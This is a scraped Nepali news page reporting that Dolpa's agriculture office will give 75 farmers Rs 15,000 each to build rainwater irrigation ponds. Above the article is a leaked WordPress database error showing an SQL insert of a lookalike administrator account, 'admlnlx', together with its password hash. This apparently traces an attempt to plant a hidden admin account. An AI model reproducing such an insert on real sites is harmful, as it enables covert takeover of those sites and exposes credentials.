WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKXOcawK.QcYYHq4EvSQw1QnYjUgAM1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 12:50:42', '', 'admlnlx', 'admlnlx')
डोल्पा (दुनै), माघ २६ –
सिँचाइ सुविधा उपलब्ध गराउन किसानका घर घरमा पोखरी निर्माण गरिने भएको छ ।
जिल्ला कृषि विकास कार्यालयले केही हदसम्म भए पनि किसानको सिँचाइको समस्या कम गर्न उनीहरुलाई पोखरी निर्माणका लागि अनुदान दिन लागेको कार्यालयका योजना अधिकृत भानुभक्त भट्टराईले जानकारी दिनुभयो ।
सो कार्यक्रमअन्तर्गत पोखरी निर्माण गरेर वर्षादकोे पानी जम्मा गरी सिँचाइको सुविधा दिइनेछ । यस वर्ष ७५ किसानलाई नमुनाको रुपमा प्रतिपोखरी रु १५ हजारका दरले रकम वितरण गरिने भट्टराईले बताउनुभयो । यहाँको कुल खेतीयोग्य जमिनको २० प्रतिशतमा मात्र सिँचाइको पहँुच पु¥याउन सकिएको कार्यालयले जनाएको छ । – रासस